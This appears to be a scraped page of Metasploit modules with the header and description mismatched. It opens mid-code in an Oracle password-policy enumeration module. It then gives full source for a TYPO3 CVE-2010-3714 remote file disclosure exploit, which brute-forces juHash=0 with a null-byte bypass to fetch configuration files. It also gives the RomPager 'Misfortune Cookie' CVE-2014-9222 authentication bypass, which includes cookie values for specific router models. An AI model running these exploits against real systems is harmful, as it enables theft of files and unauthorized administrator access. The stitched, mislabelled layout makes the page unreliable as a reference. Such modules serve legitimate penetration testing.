e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LIFE_TIME')              plit = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_TIME')              prt = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_MAX')              prm = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LOCK_TIME')              plot = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_GRACE_TIME')              pgt = e.elements['LIMIT'].get_text          end        end        print_good(          "\tFailed Login Attempts: #{fla}\n\t" +          "Password Life Time: #{plit}\n\t" +          "Password Reuse Time: #{prt}\n\t" +          "Password Reuse Max: #{prm}\n\t" +          "Password Lock Time: #{plot}\n\t" +          "Password Grace Time: #{pgt}"        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Maximum Reuse Time: #{prm}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Reuse Time: #{prt}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Life Time: #{plit}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Fail Logins Permitted: #{fla}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Lockout Time: #{plot}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Password Grace Time: #{pgt}",          :update => :unique_data        )      end      break if good    end # users.each    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  endend

Oracle XML DB SID Discovery Via Brute Force

This Metasploit module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes. Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0. This flaw can be used to read any file that the web server user account has access to view.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure',      'Description' => %q{        This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.        Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.        This flaw can be used to read any file that the web server user account has access to view.      },      'References' => [        ['CVE', '2010-3714'],        ['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020'],        ['URL', 'http://gregorkopf.de/slides_berlinsides_2010.pdf'],      ],      'Author' => [        'Chris John Riley',        'Gregor Kopf', # Original Discovery      ],      'License' => MSF_LICENSE    )    register_options(      [        OptString.new('URI', [true, 'TYPO3 Path', '/']),        OptString.new('RFILE', [true, 'The remote file to download', 'typo3conf/localconf.php']),        OptInt.new('MAX_TRIES', [true, 'Maximum tries', 10000]),      ]    )  end  def run    # Add padding to bypass TYPO3 security filters    #    # Null byte fixed in PHP 5.3.4    #    case datastore['RFILE']    when nil      # Nothing    when /localconf\.php$/i      jumpurl = "#{datastore['RFILE']}%00/."    when %r{^\.\.(/|\\)}i      print_error('Directory traversal detected... you might want to start that with a /.. or \\..')    else      jumpurl = datastore['RFILE'].to_s    end    print_status("Establishing a connection to #{rhost}:#{rport}")    print_status("Trying to retrieve #{datastore['RFILE']}")    location_base = Rex::Text.rand_text_numeric(1)    counter = 0    queue = []    print_status('Creating request queue')    1.upto(datastore['MAX_TRIES']) do      counter += 1      locationData = "#{location_base}::#{counter}"      queue << "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=0"      if ((counter.to_f / datastore['MAX_TRIES'].to_f) * 100.0).to_s =~ /(25|50|75|100).0$/ # Display percentage complete every 25%        percentage = (counter.to_f / datastore['MAX_TRIES'].to_f) * 100        print_status("Queue #{percentage.to_i}% compiled - [#{counter} / #{datastore['MAX_TRIES']}]")      end    end    print_status('Queue compiled. Beginning requests... grab a coffee!')    counter = 0    queue.each do |check|      counter += 1      check = check.sub('//', '/') # Prevent double // from appearing in uri      begin        file = send_request_raw({          'uri'  => check,          'method'  => 'GET',          'headers'  =>            {              'Connection' => 'Close'            }        }, 25)      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout        return      rescue ::Timeout::Error, ::Errno::EPIPE => e        print_error(e.message)        return      end      if file.nil?        print_error('Connection timed out')        return      end      if ((counter.to_f / queue.length.to_f) * 100.0).to_s =~ /\d0.0$/ # Display percentage complete every 10%        percentage = (counter.to_f / queue.length.to_f) * 100.0        print_status("Requests #{percentage.to_i}% complete - [#{counter} / #{queue.length}]")      end      # file can be nil      case file.headers['Content-Type']      when 'text/html'        case file.body        when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'          print_error("File #{datastore['RFILE']} does not exist.")          return        when /jumpurl Secure: locationData/i          print_error("File #{datastore['RFILE']} is not accessible.")          return        when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'          print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")          return        end      when 'application/octet-stream'        addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB        print_good('Found matching hash')        print_good('Writing local file ' + File.basename(datastore['RFILE'].downcase) + ' to loot')        store_loot('typo3_' + File.basename(datastore['RFILE'].downcase), 'text/xml', addr, file.body, 'typo3_' + File.basename(datastore['RFILE'].downcase), 'Typo3_sa_2010_020')        return      end    end    print_error("#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}")  endend

TYPO3 Sa-2010-020 Remote File Disclosure

This Metasploit module exploits HTTP servers that appear to be vulnerable to the Misfortune Cookie vulnerability which affects Allegro Software Rompager versions before 4.34 and can allow attackers to authenticate to the HTTP service as an administrator without providing valid credentials.

**Allegro Software RomPager Misfortune Cookie (CVE-2014-9222) Authentication Bypass**

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",        'Description' => %q{          This module exploits HTTP servers that appear to be vulnerable to the          'Misfortune Cookie' vulnerability which affects Allegro Software          Rompager versions before 4.34 and can allow attackers to authenticate          to the HTTP service as an administrator without providing valid          credentials.        },        'Author' => [          'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module          'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module          'Lior Oppenheim' # CVE-2014-9222        ],        'References' => [          ['CVE', '2014-9222'],          ['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],          ['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices          ['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC        ],        'DisclosureDate' => '2014-12-17',        'License' => MSF_LICENSE      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'URI to test', '/']),      ], Exploit::Remote::HttpClient    )    register_advanced_options(      [        Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),      ], Exploit::Remote::HttpClient    )  end  def headers    {      'Referer' => full_uri    }  end  # List of known values and models  def devices_list    known_devices = {      :'AZ-D140W' =>          {            name: 'Azmoon', model: 'AZ-D140W', values: [              [107367693, 13]            ]          },      :'BiPAC 5102S' =>            {              name: 'Billion', model: 'BiPAC 5102S', values: [                [107369694, 13]              ]            },      :'BiPAC 5200' =>            {              name: 'Billion', model: 'BiPAC 5200', values: [                [107369545, 9],                [107371218, 21]              ]            },      :'BiPAC 5200A' =>            {              name: 'Billion', model: 'BiPAC 5200A', values: [                [107366366, 25],                [107371453, 9]              ]            },      :'BiPAC 5200GR4' =>            {              name: 'Billion', model: 'BiPAC 5200GR4', values: [                [107367690, 21]              ]            },      :'BiPAC 5200SRD' =>            {              name: 'Billion', model: 'BiPAC 5200SRD', values: [                [107368270, 1],                [107371378, 3],                [107371218, 13]              ]            },      :'DSL-2520U' =>            {              name: 'D-Link', model: 'DSL-2520U', values: [                [107368902, 25]              ]            },      :'DSL-2600U' =>            {              name: 'D-Link', model: 'DSL-2600U', values: [                [107366496, 13],                [107360133, 20]              ]            },      :'TD-8616' =>            {              name: 'TP-Link', model: 'TD-8616', values: [                [107371483, 21],                [107369790, 17],                [107371161, 1],                [107371426, 17],                [107370211, 5],              ]            },      :'TD-8817' =>            {              name: 'TP-Link', model: 'TD-8817', values: [                [107369790, 17],                [107369788, 1],                [107369522, 25],                [107369316, 21],                [107369321, 9],                [107351277, 20]              ]            },      :'TD-8820' =>            {              name: 'TP-Link', model: 'TD-8820', values: [                [107369768, 17]              ]            },      :'TD-8840T' =>            {              name: 'TP-Link', model: 'TD-8840T', values: [                [107369845, 5],                [107369790, 17],                [107369570, 1],                [107369766, 1],                [107369764, 5],                [107369688, 17]              ]            },      :'TD-W8101G' =>            {              name: 'TP-Link', model: 'TD-W8101G', values: [                [107367772, 37],                [107367808, 21],                [107367751, 21],                [107367749, 13],                [107367765, 25],                [107367052, 25],                [107365835, 1]              ]            },      :'TD-W8151N' =>            {              name: 'TP-Link', model: 'TD-W8151N', values: [                [107353867, 24]              ]            },      :'TD-W8901G' =>            {              name: 'TP-Link', model: 'TD-W8901G', values: [                [107367787, 21],                [107368013, 5],                [107367854, 9],                [107367751, 21],                [107367749, 13],                [107367765, 25],                [107367682, 21],                [107365835, 1],                [107367052, 25]              ]            },      :'TD-W8901GB' =>            {              name: 'TP-Link', model: 'TD-W8901GB', values: [                [107367756, 13],                [107369393, 21]              ]            },      :'TD-W8901N' =>            {              name: 'TP-Link', model: 'TD-W8901N', values: [                [107353880, 0]              ]            },      :'TD-W8951ND' =>            {              name: 'TP-Link', model: 'TD-W8951ND', values: [                [107369839, 25],                [107369876, 13],                [107366743, 21],                [107364759, 25],                [107364759, 13],                [107364760, 21]              ]            },      :'TD-W8961NB' =>            {              name: 'TP-Link', model: 'TD-W8961NB', values: [                [107369844, 17],                [107367629, 21],                [107366421, 13]              ]            },      :'TD-W8961ND' =>            {              name: 'TP-Link', model: 'TD-W8961ND', values: [                [107369839, 25],                [107369876, 13],                [107364732, 25],                [107364771, 37],                [107364762, 29],                [107353880, 0],                [107353414, 36]              ]            },      :'P-660R-T3 v3' => # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s            {              name: 'ZyXEL', model: 'P-660R-T3', values: [                [107369567, 21]              ]            },      :'P-660RU-T3 v2' => # Couldn't verify this            {              name: 'ZyXEL', model: 'P-660R-T3', values: [                [107369567, 21]              ]            },      ALL => # Used when `ForceAttempt` === true            { name: 'Unknown', model: 'Forced', values: [] }    }    # collect all known cookies for a brute force option    all_cookies = []    known_devices.collect { |_, v| v[:values] }.each do |list|      all_cookies += list    end    known_devices[:ALL][:values] = all_cookies.uniq    known_devices  end  def check_response_fingerprint(res, fallback_status)    fp = http_fingerprint(response: res)    vprint_status("Fingerprint: #{fp}")    # ensure the fingerprint at least appears vulnerable    if %r{RomPager/(?<version>[\d.]+)} =~ fp      vprint_status("#{peer} is RomPager #{version}")      if Rex::Version.new(version) < Rex::Version.new('4.34') && /realm="(?<model>.+)"/ =~ fp        return model      end    end    fallback_status  end  def run    res = send_request_raw(      'uri' => normalize_uri(target_uri.path.to_s),      'method' => 'GET'    )    model = check_response_fingerprint(res, Exploit::CheckCode::Detected)    if model != Exploit::CheckCode::Detected      devices = devices_list[model.to_sym]      devices = devices_list[:ALL] if devices.nil? && datastore['ForceAttempt']      if !devices.nil?        print_good("Detected device:#{devices[:name]} #{devices[:model]}")        devices[:values].each do |value|          cookie = "C#{value[0]}=#{'B' * value[1]}\x00"          res = send_request_raw(            'uri' => normalize_uri(target_uri.path.to_s),            'method' => 'GET',            'headers' => headers.merge('Cookie' => cookie)          )          if !res.nil? && (res.code <= 302)            print_good('Good response, please check host, authentication should be disabled')            break          else            print_error('Bad response')          end        end      else        print_error("No matching values for fingerprint #{model}")      end    else      print_error('Unknown device')    end  endend

Tag

#pdf